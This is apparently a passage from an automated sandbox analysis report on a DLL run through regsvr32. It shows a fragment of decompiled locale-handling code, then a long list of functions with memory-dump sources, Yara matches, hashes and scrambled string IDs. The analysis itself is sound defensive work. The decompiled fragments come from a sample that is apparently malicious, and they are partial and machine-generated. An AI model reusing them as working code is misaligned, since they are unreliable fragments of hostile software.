				asm("sbb edx, edx");
				_t83 = (_t81 & 0xfffff005) + 0x1002;
				_t48 = GetLocaleInfoW(??, ??, ??, ??);
				r15d = 0;
				if (_t48 != 0) goto 0x80040cf7;
				 *_t142 = r15d;
				goto 0x80040e8b;
				_t50 = E000000011800441B8(_t83, _t116,  *((intOrPtr*)(_t144 + 8)),  &_v280);
				_t156 = _t155 | 0xffffffff;
				if (_t50 != 0) goto 0x80040dc3;
				r9d = _t156 + 0x79;
				asm("sbb edx, edx");
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x80040cea;
				if (E000000011800441B8((_t83 & 0xfffff002) + 0x1001, _t116,  *_t144,  &_v280) != 0) goto 0x80040d55;
				 *_t142 =  *_t142 | 0x00000304;
				_t142[1] = _t70;
				goto 0x80040dc0;
				if (( *_t142 & 0x00000002) != 0) goto 0x80040dc3;
				if ( *((intOrPtr*)(_t144 + 0x14)) == r15d) goto 0x80040d95;
				_t55 = E00000001180044330((_t83 & 0xfffff002) + 0x1001, _t116,  *_t144,  *((intOrPtr*)(_t144 + 0x14)));
				if (_t55 != 0) goto 0x80040d95;
				 *_t142 =  *_t142 | 0x00000002;
				_t142[2] = _t70;
				if ( *((intOrPtr*)( *_t144 + (_t156 + 1) * 2)) != r15w) goto 0x80040d81;
				if (_t55 !=  *((intOrPtr*)(_t144 + 0x14))) goto 0x80040dc3;
				_t142[1] = _t70;
				goto 0x80040dc3;
				_t76 =  *_t142;
				if ((_t76 & 0x00000001) != 0) goto 0x80040dc3;
				r8d = r15d;
				if (_t70 ==  *0x80052380) goto 0x80040dc3;
				r8d = r8d + 1;
				if (r8d - 0xa < 0) goto 0x80040da6;
				 *_t142 = _t76 | 0x00000001;
				_t142[2] = _t70;
				if (( *_t142 & 0x00000300) == 0x300) goto 0x80040e81;
				r9d = 0x78;
				asm("sbb edx, edx");
				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x80040cea;
				if (E000000011800441B8(((_t83 & 0xfffff002) + 0x00001001 & 0xfffff002) + 0x1001, r8d,  *_t144,  &_v280) != 0) goto 0x80040e47;
				asm("bts dword [edi], 0x9");
				if ( *((intOrPtr*)(_t144 + 0x18)) == r15d) goto 0x80040e27;
				asm("bts eax, 0x8");
				goto 0x80040e78;
				if ( *((intOrPtr*)(_t144 + 0x14)) == r15d) goto 0x80040e1f;
				if ( *((intOrPtr*)( *_t144 + (_t156 + 1) * 2)) != r15w) goto 0x80040e30;
				if (r14d !=  *((intOrPtr*)(_t144 + 0x14))) goto 0x80040e1f;
				goto 0x80040e66;
				if ( *((intOrPtr*)(_t144 + 0x18)) != r15d) goto 0x80040e81;
				if ( *((intOrPtr*)(_t144 + 0x14)) == r15d) goto 0x80040e81;
				if (E000000011800441B8(1, r8d,  *_t144,  &_v280) != 0) goto 0x80040e81;
				if (E000000011800410D8(_t70, 0, r8d, _t121,  *_t144,  &_v280, _t144) == 0) goto 0x80040e81;
				asm("bts dword [edi], 0x8");
				if (_t142[1] != r15d) goto 0x80040e81;
				_t142[1] = _t70;
				return E000000011800010E0( !( *_t142 >> 2) & 0x00000001, _t70, _v40 ^ _t146 - 0x00000120);
			}























                                                                                                    0x180040c70
                                                                                                    0x180040c70
                                                                                                    0x180040c70
                                                                                                    0x180040c75
                                                                                                    0x180040c86
                                                                                                    0x180040c8d
                                                                                                    0x180040c90
                                                                                                    0x180040c98
                                                                                                    0x180040c9b
                                                                                                    0x180040ca0
                                                                                                    0x180040ca0
                                                                                                    0x180040ca7
                                                                                                    0x180040caf
                                                                                                    0x180040cb6
                                                                                                    0x180040cc5
                                                                                                    0x180040ccd
                                                                                                    0x180040ccf
                                                                                                    0x180040cd7
                                                                                                    0x180040cdd
                                                                                                    0x180040ce3
                                                                                                    0x180040ce8
                                                                                                    0x180040cea
                                                                                                    0x180040cf2
                                                                                                    0x180040d00
                                                                                                    0x180040d05
                                                                                                    0x180040d0b
                                                                                                    0x180040d14
                                                                                                    0x180040d21
                                                                                                    0x180040d37
                                                                                                    0x180040d48
                                                                                                    0x180040d4a
                                                                                                    0x180040d50
                                                                                                    0x180040d53
                                                                                                    0x180040d58
                                                                                                    0x180040d5e
                                                                                                    0x180040d6c
                                                                                                    0x180040d73
                                                                                                    0x180040d75
                                                                                                    0x180040d7b
                                                                                                    0x180040d89
                                                                                                    0x180040d8e
                                                                                                    0x180040d90
                                                                                                    0x180040d93
                                                                                                    0x180040d95
                                                                                                    0x180040d9a
                                                                                                    0x180040d9c
                                                                                                    0x180040da9
                                                                                                    0x180040dab
                                                                                                    0x180040db9
                                                                                                    0x180040dbe
                                                                                                    0x180040dc0
                                                                                                    0x180040dce
                                                                                                    0x180040dde
                                                                                                    0x180040de6
                                                                                                    0x180040dfc
                                                                                                    0x180040e11
                                                                                                    0x180040e13
                                                                                                    0x180040e1d
                                                                                                    0x180040e1f
                                                                                                    0x180040e25
                                                                                                    0x180040e2b
                                                                                                    0x180040e38
                                                                                                    0x180040e3e
                                                                                                    0x180040e45
                                                                                                    0x180040e4b
                                                                                                    0x180040e51
                                                                                                    0x180040e62
                                                                                                    0x180040e72
                                                                                                    0x180040e74
                                                                                                    0x180040e7c
                                                                                                    0x180040e7e
                                                                                                    0x180040eb3

                                                                                                    APIs
                                                                                                      • Part of subcall function 000000018002C43C: GetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C446
                                                                                                      • Part of subcall function 000000018002C43C: SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4C4
                                                                                                      • Part of subcall function 000000018002C43C: abort.LIBCMT ref: 000000018002C4CA
                                                                                                      • Part of subcall function 000000018002C43C: SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4AE
                                                                                                    • GetLocaleInfoW.KERNEL32 ref: 0000000180040CDD
                                                                                                    • GetLocaleInfoW.KERNEL32 ref: 0000000180040D2F
                                                                                                    • GetLocaleInfoW.KERNEL32 ref: 0000000180040DF4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorInfoLastLocale$abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 1112924360-0
                                                                                                    • Opcode ID: f8b9df3676b413aae32afe50e6d82dec5c90197f08110b08874e72ace519924a
                                                                                                    • Instruction ID: 1a18c44185ce1d99933c7441a5f088c5915a3843b2ec69a9a75ff231325c7edf
                                                                                                    • Opcode Fuzzy Hash: f8b9df3676b413aae32afe50e6d82dec5c90197f08110b08874e72ace519924a
                                                                                                    • Instruction Fuzzy Hash: 72611472600A4986EBB29F11E5C07D973E1F3887C8F12C625EB89976D4DF38D6A8C704
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02611F30 Relevance: 4.6, Strings: 3, Instructions: 836COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <q.$}YQn$Z
                                                                                                    • API String ID: 0-212911227
                                                                                                    • Opcode ID: ef214a46dbc42be99ac2a5c0e14a312657a1b0ae60c98b1b6e637ec37b1009aa
                                                                                                    • Instruction ID: 51fd3e79563465fc9b5cf022603459c9ec708c2bad644c124a277340f7da1452
                                                                                                    • Opcode Fuzzy Hash: ef214a46dbc42be99ac2a5c0e14a312657a1b0ae60c98b1b6e637ec37b1009aa
                                                                                                    • Instruction Fuzzy Hash: 7A922F7058438B8BDB78CF28C885BED7BE1FB84304F11462DD86A8BB91E7749645DB81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02619D50 Relevance: 4.3, Strings: 3, Instructions: 561COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (u$V6s?$\.
                                                                                                    • API String ID: 0-2892916905
                                                                                                    • Opcode ID: e441f7b5805f23b0cec8768733d4fc20c6e377ef0c93747bff2ffb8a70a2e99d
                                                                                                    • Instruction ID: 0f387507376cbf053147db0bd8c65fb8d672405791e5072925856a1a78633a89
                                                                                                    • Opcode Fuzzy Hash: e441f7b5805f23b0cec8768733d4fc20c6e377ef0c93747bff2ffb8a70a2e99d
                                                                                                    • Instruction Fuzzy Hash: 4662E470512B888FEBB8CF28CC996DD7BB2FB88314F104219D80A8F251DB765665CF49
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0262612C Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: QD$S'4)$f6#O
                                                                                                    • API String ID: 0-1935501322
                                                                                                    • Opcode ID: 60abba6396bae9e817427f9cad7860474e9b6866f4d5d435d9e490e1a73d5f39
                                                                                                    • Instruction ID: bbf35864f9d0284a273020374f752289985bdc4c05026759b876b1a66ba6f207
                                                                                                    • Opcode Fuzzy Hash: 60abba6396bae9e817427f9cad7860474e9b6866f4d5d435d9e490e1a73d5f39
                                                                                                    • Instruction Fuzzy Hash: 50220670904749EFDB58DFA8C49A99EBBF1FB44344F00816DE80AAB390D7749A59CF81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02624B38 Relevance: 4.0, Strings: 3, Instructions: 282COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Kaw$D"$D"
                                                                                                    • API String ID: 0-528324057
                                                                                                    • Opcode ID: 7778d84e527b74af94ba57484457afa572d877dbf827dc3f6e04abe91ee63f45
                                                                                                    • Instruction ID: d27f5c9b117f5747e9a9b863c6668432363d723a699739926f5fc9e6f7823365
                                                                                                    • Opcode Fuzzy Hash: 7778d84e527b74af94ba57484457afa572d877dbf827dc3f6e04abe91ee63f45
                                                                                                    • Instruction Fuzzy Hash: 6FF1617150478C8FEBB9DF28CC896DA7BA4FB14314F60422ADC0EDE260DB769695CB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260D0D4 Relevance: 4.0, Strings: 3, Instructions: 274COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: %(8R$vkU_$JR^
                                                                                                    • API String ID: 0-2140164885
                                                                                                    • Opcode ID: 6a34b191dec9cedfc73118cf79baa237ec438b45e89471e253f6d041cfad7791
                                                                                                    • Instruction ID: 4266b5463e1b6a44ab4a90f07c7e7c04f3dfe424a024465499b202b59993cba2
                                                                                                    • Opcode Fuzzy Hash: 6a34b191dec9cedfc73118cf79baa237ec438b45e89471e253f6d041cfad7791
                                                                                                    • Instruction Fuzzy Hash: 60D1E07150270CCBDB58DF28C68A59E7BE5FF44708F104129FD1A8B2A0D7B4E929CB49
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261E184 Relevance: 4.0, Strings: 3, Instructions: 270COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $W\K$Gn~$x(
                                                                                                    • API String ID: 0-4083155136
                                                                                                    • Opcode ID: 5d9dc2521d66c8bfc1118ccf77780015ba8be7719eb957cc082e6d51c146a52f
                                                                                                    • Instruction ID: e76a569c16adceb7ec9e6381bcba09d019fc9ba5bec2c939cb87e14976df3884
                                                                                                    • Opcode Fuzzy Hash: 5d9dc2521d66c8bfc1118ccf77780015ba8be7719eb957cc082e6d51c146a52f
                                                                                                    • Instruction Fuzzy Hash: A5D126709007498FDF48CF68C88A4EEBBB1FB58358F16421DE84AA6290D778D545CF89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026138D8 Relevance: 4.0, Strings: 3, Instructions: 239COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0c!`$r@w$rwJ:
                                                                                                    • API String ID: 0-3391335755
                                                                                                    • Opcode ID: 444930258c6d0adef947402a46f402e60f5dd84f4380e4cba1e14e86a8f21352
                                                                                                    • Instruction ID: ff962687d8a69082e07aaf3ecf0f5d34805e8f793c4af7274d29e8b9f1d5fb8a
                                                                                                    • Opcode Fuzzy Hash: 444930258c6d0adef947402a46f402e60f5dd84f4380e4cba1e14e86a8f21352
                                                                                                    • Instruction Fuzzy Hash: 83B1487090079ACFDB18CFA8D88959EBBB1FF44304F044A19E816EB394D7B4A925CF81
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02608590 Relevance: 4.0, Strings: 3, Instructions: 229COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID: .L$Th)$a4zP
                                                                                                    • API String ID: 963392458-2652451595
                                                                                                    • Opcode ID: feede94e6aa4c2a8f62964943ae5d3557c2221a8501c5b8d8399da2dde5387bc
                                                                                                    • Instruction ID: 2283f14e5c1c801c16e57213c309501d5c937e1d22fd0062093bab4b90fcfa81
                                                                                                    • Opcode Fuzzy Hash: feede94e6aa4c2a8f62964943ae5d3557c2221a8501c5b8d8399da2dde5387bc
                                                                                                    • Instruction Fuzzy Hash: 86B1F1B0D04758CFDF68DFA8C88958DBBB1FB48308F20421DE916AB2A2DB759905CF41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260D97C Relevance: 3.9, Strings: 3, Instructions: 189COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *p8$C\$X2
                                                                                                    • API String ID: 0-619063027
                                                                                                    • Opcode ID: f01680e359d2698cc8086d5a4893e38ade075e01c223a6aa9a0d764245777b28
                                                                                                    • Instruction ID: 9d447c0d5ca311a53df5e1986c98f2a2584fd6b2439ed852455aaca5d7635657
                                                                                                    • Opcode Fuzzy Hash: f01680e359d2698cc8086d5a4893e38ade075e01c223a6aa9a0d764245777b28
                                                                                                    • Instruction Fuzzy Hash: 4B9104B450170CCBEB6CDF38D49A59E3BA8FB40304F50912DEC2A8A2A1D778E505CF06
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02601FB0 Relevance: 3.9, Strings: 3, Instructions: 179COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #X$*$3<
                                                                                                    • API String ID: 0-1568999847
                                                                                                    • Opcode ID: 596c5cb6069957a75baf7d7b19b033206cdaff027b62e0ccfcee262ee2a3518e
                                                                                                    • Instruction ID: 73739277d417a3325d331dd906658e610924399bfd890721d3e60ac2cbcf9cd1
                                                                                                    • Opcode Fuzzy Hash: 596c5cb6069957a75baf7d7b19b033206cdaff027b62e0ccfcee262ee2a3518e
                                                                                                    • Instruction Fuzzy Hash: 50617D7061C7488FC7ACDF18D89666BB7E1FB89300F801A1DE9CA87251D774A841CB87
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261E990 Relevance: 3.9, Strings: 3, Instructions: 152COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @r$LK$\t
                                                                                                    • API String ID: 0-71415955
                                                                                                    • Opcode ID: 4c1fd14200181250ae9a766d22e9d72859e1155191ef98a2f331eb43c51124a2
                                                                                                    • Instruction ID: ca61ae4366328567f50eeab8590db56b36061cbf6ee4f091cc16bebd8ae31ede
                                                                                                    • Opcode Fuzzy Hash: 4c1fd14200181250ae9a766d22e9d72859e1155191ef98a2f331eb43c51124a2
                                                                                                    • Instruction Fuzzy Hash: B771CE705187448FD368DF29D59A42BBBF1FB86748F004A1DF68A862A0D77AD948CF07
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026196C8 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Ao$W#$ai
                                                                                                    • API String ID: 0-783161371
                                                                                                    • Opcode ID: a0cbecdb3c2dc817b727bcc0ecdc3ea3428697ecf5d4fabbecc4da1df9efff29
                                                                                                    • Instruction ID: 62cbe0211caedecb9e7ca389e042659856bcfade0e99fea601f3f18248b61c73
                                                                                                    • Opcode Fuzzy Hash: a0cbecdb3c2dc817b727bcc0ecdc3ea3428697ecf5d4fabbecc4da1df9efff29
                                                                                                    • Instruction Fuzzy Hash: C061317051074A8BEF58CF24C89A4DE3FB1FB68398F250219FC46A62A0D778E655CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02603BC0 Relevance: 3.9, Strings: 3, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: C^$ZDC$e
                                                                                                    • API String ID: 0-3692183961
                                                                                                    • Opcode ID: 4f53e4ef6263428795d30c0848357476fe5e5996a48f00349c2c30bf4e84c8c4
                                                                                                    • Instruction ID: 81a7f7f9a73538def58c49d8b2e694be9283ed642a9e2dbab86eb5f118f9ed56
                                                                                                    • Opcode Fuzzy Hash: 4f53e4ef6263428795d30c0848357476fe5e5996a48f00349c2c30bf4e84c8c4
                                                                                                    • Instruction Fuzzy Hash: E861B3B090078E8FDF48CF68C94A5DE7BB0FB58348F404A1DEC66A6290D3B49665CF84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02610944 Relevance: 3.9, Strings: 3, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: `?$ghgq$wvf
                                                                                                    • API String ID: 0-1842883794
                                                                                                    • Opcode ID: 3c8c15399584986ebbafe08e0ae27772780acd51c384b6079a445796b8cee6e9
                                                                                                    • Instruction ID: 2731f6303d77a36a9fa3f3ebd46a6422deabb8c918eb6e2d2380a6cf532a5101
                                                                                                    • Opcode Fuzzy Hash: 3c8c15399584986ebbafe08e0ae27772780acd51c384b6079a445796b8cee6e9
                                                                                                    • Instruction Fuzzy Hash: 9951D07114878CDBEBBADF24C8896D93BB1FB48304F908619DC4E8E290CB75578ADB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02602210 Relevance: 3.9, Strings: 3, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: "?$^~$S
                                                                                                    • API String ID: 0-2969737043
                                                                                                    • Opcode ID: dcb4b27ef74c5b0192d7222982fbb3b92f969085556004dd22f3cb5f45d45648
                                                                                                    • Instruction ID: 92257990e2006fa7c079519493c498f8d856959a446456cd8e46d98468ea0e6e
                                                                                                    • Opcode Fuzzy Hash: dcb4b27ef74c5b0192d7222982fbb3b92f969085556004dd22f3cb5f45d45648
                                                                                                    • Instruction Fuzzy Hash: A95192B190034E8FDB48CF64D88A4DE7FB5FB68388F21461DE85596250D3B496A5CFC4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0261AE14 Relevance: 3.8, Strings: 3, Instructions: 87COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: MdVa$TS$XC
                                                                                                    • API String ID: 0-1302248092
                                                                                                    • Opcode ID: c553af62382774d689e47f98853d929afc4c1a76a85edd1f517acc05c4014019
                                                                                                    • Instruction ID: cb78bde46d7524565eff41a8a47a52cf5a035c2841148ba66d4afd180c2fd758
                                                                                                    • Opcode Fuzzy Hash: c553af62382774d689e47f98853d929afc4c1a76a85edd1f517acc05c4014019
                                                                                                    • Instruction Fuzzy Hash: E94194B190074A8FDB48CF24C4864DE7FB0FB68398F51461DF85996290D77896A4CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02622BD8 Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: >@$Hi$}!
                                                                                                    • API String ID: 0-3930259111
                                                                                                    • Opcode ID: ed6beefe1718cb6c71cd5eb73621ec03bf331077df276893c8e66e97587c8efd
                                                                                                    • Instruction ID: 042e74e93f4dc8a1274c8c35989875256c5d0ad03156d3d4d084b3c7ad925861
                                                                                                    • Opcode Fuzzy Hash: ed6beefe1718cb6c71cd5eb73621ec03bf331077df276893c8e66e97587c8efd
                                                                                                    • Instruction Fuzzy Hash: BA41D0B090034E8BCB08DF28C4864DE7FB1FB68388F21461DF84A9A250D374D6A4CBC5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0260A37C Relevance: 3.8, Strings: 3, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: j84x$p7]$|
                                                                                                    • API String ID: 0-2261649757
                                                                                                    • Opcode ID: fe8ed25b3986266160e8c60a638a6dedf60f527b480016cf6a9619eea447b328
                                                                                                    • Instruction ID: 98b68f5085dba23bf7a15a1631db7dad079cfeabbb1f4831490eeb0d75b8aa2d
                                                                                                    • Opcode Fuzzy Hash: fe8ed25b3986266160e8c60a638a6dedf60f527b480016cf6a9619eea447b328
                                                                                                    • Instruction Fuzzy Hash: 7341A3B190078E8FDB44CF68C8895DE7BF0FB58358F100A19E869A6294D3B89665CF84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026253EC Relevance: 3.8, Strings: 3, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: +$.U$s*
                                                                                                    • API String ID: 0-20844554
                                                                                                    • Opcode ID: 8bf62850641d4c949655b2735aeb11380cf8990142b8de7d88d4bc9a4cc51b28
                                                                                                    • Instruction ID: e44991044a6fb0374d0dd43f6b3d5d6b4e8c8c4ef46a578be65f4606cc0e7b60
                                                                                                    • Opcode Fuzzy Hash: 8bf62850641d4c949655b2735aeb11380cf8990142b8de7d88d4bc9a4cc51b28
                                                                                                    • Instruction Fuzzy Hash: CD4194B181074E8FDF48CF64C48A5DE7FB0FB68398F210619E859A6250D3B896A4CFC5
                                                                                                    Uniqueness

